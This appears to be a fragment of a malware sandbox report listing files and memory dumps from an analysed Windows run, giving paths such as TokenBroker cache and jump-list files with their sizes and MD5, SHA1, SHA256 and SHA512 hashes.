C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\49dbe2955480c7f6ef8cec9c4320c9868d9293fd.tbres

Filesize
2KB

MD5
be1dbf0cbed12f1b0081f3b702159855

SHA1
e7d9a995acaaf7394c280e20eacde7ed24b59d1b

SHA256
9651d267b8e3c4e8ab98febadbb511fdaeffa57680ba7b5e064452a4864b6077

SHA512
9d5beeed70a66e77ee3ff17ac879d9a5a74f9ad50399a880ea12fccca9bcb3059d585f980758a48a77f0b026dea7604c7e1ffe25f0bdadc8f0aa69dd302765ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres

Filesize
4KB

MD5
e69b12e69a9b33f9833ceaa7a36283dd

SHA1
b0428b764769217ec6955b50bbd469fadfcbddb9

SHA256
27499b6461574e9f2dc36ff0bdf34ebd83e743f92a61f13ed2a66c7f1201cd48

SHA512
1c2ae594a4f472c199ffd69466bfa124d9980bfe9193076d329b66b56475d9c06286d462734de18a29e1cb367fcf6f3ccbadac8a5e20a5b3dfc12904a2dd9f3e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
1KB

MD5
e163f28d3469e79305f6211af3576fef

SHA1
8bc98d4cbb89d52cc569297c58242daf2d05f2a7

SHA256
b0f2409d544f81f27ff46d12861067cd9692f529928ecaf049a6d1045a2c334e

SHA512
2562713e6a1f660b38cbb45e4958cffe13fe457ab533508881c7b2d521eacb01ba857f2d4d8bf167c3f0597a0b105eb1247bc9376791ab05f524d3a6e4a012bd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
1KB

MD5
b4d725d19f99254f596c76f61aa469ab

SHA1
d212b929db408234836406b9faa69642a0ca59d6

SHA256
b87f8df7922cb7eb137732a4cd7895d7e96da5ba658f6cef7d3b4b715abe825a

SHA512
4cf31e5aac51955bf14edf57f0d5b447db62222150d5c9d27c941a4296d2a1b113c84bffc1883e6636b63d5cf9e5f7553328625b6b4ec38689346b64a69d67df

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
1KB

MD5
889f171a85dc2e0cc922fcfca34fe49d

SHA1
fe96d9d5fe88a820aeea7f61e47cba57e23898f2

SHA256
d287ea1ad1b0b19ddc01a2741f0bf6eb5ae56a5f5f4ff03aea20809e1449c58a

SHA512
9caa27b5bfc2b1abe9f0bffa6cd52b1eb7c0f9a045bff7800d265adb6adfdc9110c5b03da5e94ba516d2d5b0f6d3ba89b733d0c3be64ed2c1fc9839e9865bd68

Download Submit
memory/2064-228-0x00007FFBA0CB0000-0x00007FFBA0CC0000-memory.dmp

Filesize
64KB

Download
memory/2064-229-0x00007FFBA0CB0000-0x00007FFBA0CC0000-memory.dmp

Filesize
64KB

Download
memory/2064-199-0x00007FFB9EC50000-0x00007FFB9EC60000-memory.dmp

Filesize
64KB

Download
memory/2064-198-0x00007FFBA0CB0000-0x00007FFBA0CC0000-memory.dmp

Filesize
64KB

Download
memory/2064-201-0x00007FFB9EC50000-0x00007FFB9EC60000-memory.dmp

Filesize
64KB

Download
memory/2064-195-0x00007FFBA0CB0000-0x00007FFBA0CC0000-memory.dmp

Filesize
64KB

Download
memory/2064-196-0x00007FFBA0CB0000-0x00007FFBA0CC0000-memory.dmp

Filesize
64KB

Download
memory/2064-194-0x00007FFBA0CB0000-0x00007FFBA0CC0000-memory.dmp

Filesize
64KB

Download
memory/2064-226-0x00007FFBA0CB0000-0x00007FFBA0CC0000-memory.dmp

Filesize
64KB

Download
memory/2064-227-0x00007FFBA0CB0000-0x00007FFBA0CC0000-memory.dmp

Filesize
64KB

Download
memory/2064-197-0x00007FFBA0CB0000-0x00007FFBA0CC0000-memory.dmp

Filesize
64KB

Download
memory/5920-193-0x00007FFBA0CB0000-0x00007FFBA0CC0000-memory.dmp

Filesize
64KB

Download
memory/5920-192-0x00007FFBA0CB0000-0x00007FFBA0CC0000-memory.dmp

Filesize
64KB

Download
memory/5920-190-0x00007FFBA0CB0000-0x00007FFBA0CC0000-memory.dmp

Filesize
64KB

Download
memory/5920-191-0x00007FFBA0CB0000-0x00007FFBA0CC0000-memory.dmp

Filesize
64KB

Download
memory/5920-159-0x00007FFB9EC50000-0x00007FFB9EC60000-memory.dmp

Filesize
64KB

Download
memory/5920-158-0x00007FFB9EC50000-0x00007FFB9EC60000-memory.dmp

Filesize
64KB

Download
memory/5920-157-0x00007FFBA0CB0000-0x00007FFBA0CC0000-memory.dmp

Filesize
64KB

Download
memory/5920-156-0x00007FFBA0CB0000-0x00007FFBA0CC0000-memory.dmp

Filesize
64KB

Download
memory/5920-154-0x00007FFBA0CB0000-0x00007FFBA0CC0000-memory.dmp

Filesize
64KB

Download
memory/5920-155-0x00007FFBA0CB0000-0x00007FFBA0CC0000-memory.dmp

Filesize
64KB

Download
memory/5920-153-0x00007FFBA0CB0000-0x00007FFBA0CC0000-memory.dmp

Filesize
64KB

Download